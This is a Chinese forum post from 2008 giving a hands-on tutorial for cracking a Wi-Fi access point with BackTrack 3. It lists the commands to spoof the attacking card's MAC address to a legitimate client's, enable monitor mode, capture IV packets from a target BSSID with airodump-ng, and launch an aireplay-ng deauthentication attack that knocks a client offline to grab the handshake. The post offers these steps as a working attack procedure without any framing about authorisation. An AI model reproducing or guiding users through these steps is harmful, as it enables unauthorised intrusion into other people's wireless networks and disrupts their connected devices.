当然先是制作中文版本(英文版的也可以)的可以启动BT3的U盘,这个论坛里很多人介绍怎么做了,在此就略过了。
然后要做的一步相当的重要,那就是卸载你用来攻击的无线网卡,并更改它的MAC为AP的无线客户端的MAC,一定是要合法无线客户端的MAC,要不然很难成功。我的网卡名为WIFI1,大家可以用命令先看下自己的网卡名。(因为我的笔记本内置的网卡也是ATHEROS芯片的,但是破解没有成功,所以改用ICOM 的SL-5200,此卡相当不错,支持a/b/g三频,而且支持到14频道,这个很难得。最后笔记本自带的网卡也成功破解了,证实是方法不当所致)
相应的命令为:
ifconfig –a ifconfig –a wifi1 down macchanger –m 00:1a:73:c5:31:e0 wifi1 这个命令中攻击用无线网卡的MAC必须用冒号隔开,这个命令以后对MAC的操作就不需要再用冒号隔开了,直接输数字和字母就可以了(十六进制)。
其中需要注意的就是这个伪装的MAC必须与AP的无线客户端相同,要不然很难成功,至少我是这样的。
ifconfig –a wifi1 up(加载攻击用无线网卡) airmon-ng start wifi1 13 上面的13代表的是无线AP所工作的频道,2.4G WIFI用频率的最高频道为14频道。 图片中所示的“ath2”就是我们最后攻击所用的无线网卡的接口名。
准备工作完毕以后我们就可以开始了。
首先我们先开始收集ivs包。
相应的命令为:
airodump-ng – –ivs –w check – –bssid 00131004e526 –c 13 ath2 --ivs 表示只收集ivs包,
-w 后面表示收集ivs包所生成的文件名,但最后往往会在文件名后加上-01、-02等等,
--bssid 表示AP的MAC,这样做的好处就是只收集与这个MAC相对应的AP的ivs包,
-c 后面跟的AP的频道数。
这一步做完我们就可以开始正式的攻击了。 相应的攻击命令为:
aireplay-ng -0 1 –a 00131004e526 –c 001a73c5-31e0 ath2 -0 表示对无线客户端进行认证攻击,使无线客户端断线重连,以获得握手包。
1
表示攻击的次数,一般顺利的话1次就够了,不顺利的话攻击无数次都不成功,建议大家在纯的BT3下进行,VM下很难获得,我在VM做了N次,用WUSB54G V4只获得过一次握手包。
-a 后面跟的是AP的MAC,
-c 后面跟的所要攻击的无线客户端的MAC,记住这个参数一定是要-c,不能是-h哦。
攻击成功后会在airodump-ng的窗口的右上角出现捕获握手包的提示,它所保存的文件是以AP的MAC命名的XOR文件,注意与后面构建ARP包所必须的XOR文件相区别。
[此贴子已经被作者于2008-2-28 12:55:32编辑过] |